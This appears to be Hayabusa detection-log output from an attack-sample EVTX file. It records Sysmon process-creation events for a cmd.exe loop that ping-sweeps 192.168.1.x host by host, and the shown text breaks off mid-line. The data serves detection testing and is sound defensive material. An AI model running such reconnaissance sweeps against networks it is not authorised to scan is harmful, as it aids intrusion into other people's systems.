+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:18.990 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:25.529 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:30.526 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:32.005 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:36.905 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:38.514 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping 